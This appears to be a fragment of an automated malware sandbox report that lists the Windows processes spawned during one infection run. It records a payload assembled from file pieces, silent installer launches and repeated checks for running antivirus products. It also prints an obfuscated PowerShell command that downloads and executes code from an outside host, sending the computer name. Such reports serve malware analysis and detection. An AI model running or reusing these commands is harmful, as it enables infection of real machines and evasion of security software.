                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:extrac32 /Y /E Cc
                                                                                                                                                  Imagebase:0xd30000
                                                                                                                                                  File size:29'184 bytes
                                                                                                                                                  MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:moderate
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:9
                                                                                                                                                  Start time:10:36:29
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:findstr /V "Housewares" Expressions
                                                                                                                                                  Imagebase:0x1c0000
                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:10
                                                                                                                                                  Start time:10:36:29
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:cmd /c copy /b 504701\Corporation.com + Minister + Tobacco + Secrets + Nervous + Sparc + Beginning + Marathon + Fame + Spotlight 504701\Corporation.com
                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:11
                                                                                                                                                  Start time:10:36:30
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:cmd /c copy /b ..\Wa + ..\Parade + ..\Easier + ..\Marc + ..\Olympics + ..\Emergency + ..\Jeep u
                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:12
                                                                                                                                                  Start time:10:36:30
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:Corporation.com u
                                                                                                                                                  Imagebase:0xe80000
                                                                                                                                                  File size:947'288 bytes
                                                                                                                                                  MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:13
                                                                                                                                                  Start time:10:36:30
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:choice /d y /t 5
                                                                                                                                                  Imagebase:0x750000
                                                                                                                                                  File size:28'160 bytes
                                                                                                                                                  MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:17
                                                                                                                                                  Start time:10:37:06
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
                                                                                                                                                  Imagebase:0xfd0000
                                                                                                                                                  File size:433'152 bytes
                                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:18
                                                                                                                                                  Start time:10:37:06
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:19
                                                                                                                                                  Start time:10:37:23
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe"
                                                                                                                                                  Imagebase:0x230000
                                                                                                                                                  File size:8'767'044 bytes
                                                                                                                                                  MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 14%, ReversingLabs
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:20
                                                                                                                                                  Start time:10:37:24
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp" /SL5="$4042C,7785838,845824,C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe"
                                                                                                                                                  Imagebase:0x20000
                                                                                                                                                  File size:3'367'424 bytes
                                                                                                                                                  MD5 hash:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 3%, ReversingLabs
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:21
                                                                                                                                                  Start time:10:37:25
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe" /VERYSILENT
                                                                                                                                                  Imagebase:0x230000
                                                                                                                                                  File size:8'767'044 bytes
                                                                                                                                                  MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:22
                                                                                                                                                  Start time:10:37:26
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp" /SL5="$5042C,7785838,845824,C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe" /VERYSILENT
                                                                                                                                                  Imagebase:0xdb0000
                                                                                                                                                  File size:3'367'424 bytes
                                                                                                                                                  MD5 hash:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 3%, ReversingLabs
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:24
                                                                                                                                                  Start time:10:37:51
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\timeout.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"timeout" 9
                                                                                                                                                  Imagebase:0x7ff637610000
                                                                                                                                                  File size:32'768 bytes
                                                                                                                                                  MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:25
                                                                                                                                                  Start time:10:37:51
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:26
                                                                                                                                                  Start time:10:38:00
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
                                                                                                                                                  Imagebase:0x7ff62b860000
                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:27
                                                                                                                                                  Start time:10:38:00
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:28
                                                                                                                                                  Start time:10:38:00
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                                                                                                                                                  Imagebase:0x7ff7d90d0000
                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:29
                                                                                                                                                  Start time:10:38:00
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\find.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:find /I "wrsa.exe"
                                                                                                                                                  Imagebase:0x7ff799d60000
                                                                                                                                                  File size:17'920 bytes
                                                                                                                                                  MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:30
                                                                                                                                                  Start time:10:38:00
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
                                                                                                                                                  Imagebase:0x7ff62b860000
                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:31
                                                                                                                                                  Start time:10:38:00
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:32
                                                                                                                                                  Start time:10:38:00
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                                                                                                                                                  Imagebase:0x7ff7d90d0000
                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:33
                                                                                                                                                  Start time:10:38:00
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\find.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:find /I "opssvc.exe"
                                                                                                                                                  Imagebase:0x7ff799d60000
                                                                                                                                                  File size:17'920 bytes
                                                                                                                                                  MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:34
                                                                                                                                                  Start time:10:38:00
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
                                                                                                                                                  Imagebase:0x7ff62b860000
                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:35
                                                                                                                                                  Start time:10:38:00
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff70f330000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:36
                                                                                                                                                  Start time:10:38:00
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                                                                                                                                                  Imagebase:0x7ff7d90d0000
                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:37
                                                                                                                                                  Start time:10:38:00
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\find.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:find /I "avastui.exe"
                                                                                                                                                  Imagebase:0x7ff799d60000
                                                                                                                                                  File size:17'920 bytes
                                                                                                                                                  MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:38
                                                                                                                                                  Start time:10:38:01
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
                                                                                                                                                  Imagebase:0x7ff62b860000
                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:39
                                                                                                                                                  Start time:10:38:01
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:40
                                                                                                                                                  Start time:10:38:01
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                                                                                                                                                  Imagebase:0x7ff7d90d0000
                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:41
                                                                                                                                                  Start time:10:38:01
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\find.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:find /I "avgui.exe"
                                                                                                                                                  Imagebase:0x7ff799d60000
                                                                                                                                                  File size:17'920 bytes
                                                                                                                                                  MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:42
                                                                                                                                                  Start time:10:38:01
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
                                                                                                                                                  Imagebase:0x7ff62b860000
                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:43
                                                                                                                                                  Start time:10:38:01
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:44
                                                                                                                                                  Start time:10:38:01
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                                                                                                                                                  Imagebase:0x7ff7d90d0000
                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:45
                                                                                                                                                  Start time:10:38:01
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\find.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:find /I "nswscsvc.exe"
                                                                                                                                                  Imagebase:0x7ff799d60000
                                                                                                                                                  File size:17'920 bytes
                                                                                                                                                  MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:46
                                                                                                                                                  Start time:10:38:01
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                                                                                                                                                  Imagebase:0x7ff62b860000
                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:47
                                                                                                                                                  Start time:10:38:01
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:48
                                                                                                                                                  Start time:10:38:01
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                                                                                                                                                  Imagebase:0x7ff7d90d0000
                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:49
                                                                                                                                                  Start time:10:38:01
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\find.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:find /I "sophoshealth.exe"
                                                                                                                                                  Imagebase:0x7ff799d60000
                                                                                                                                                  File size:17'920 bytes
                                                                                                                                                  MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:50
                                                                                                                                                  Start time:10:38:06
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
                                                                                                                                                  Imagebase:0x7ff6ec4b0000
                                                                                                                                                  File size:846'325'235 bytes
                                                                                                                                                  MD5 hash:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Reset < >

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:18.3%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                    Signature Coverage:20.9%
                                                                                                                                                    Total number of Nodes:1481
                                                                                                                                                    Total number of Limit Nodes:24
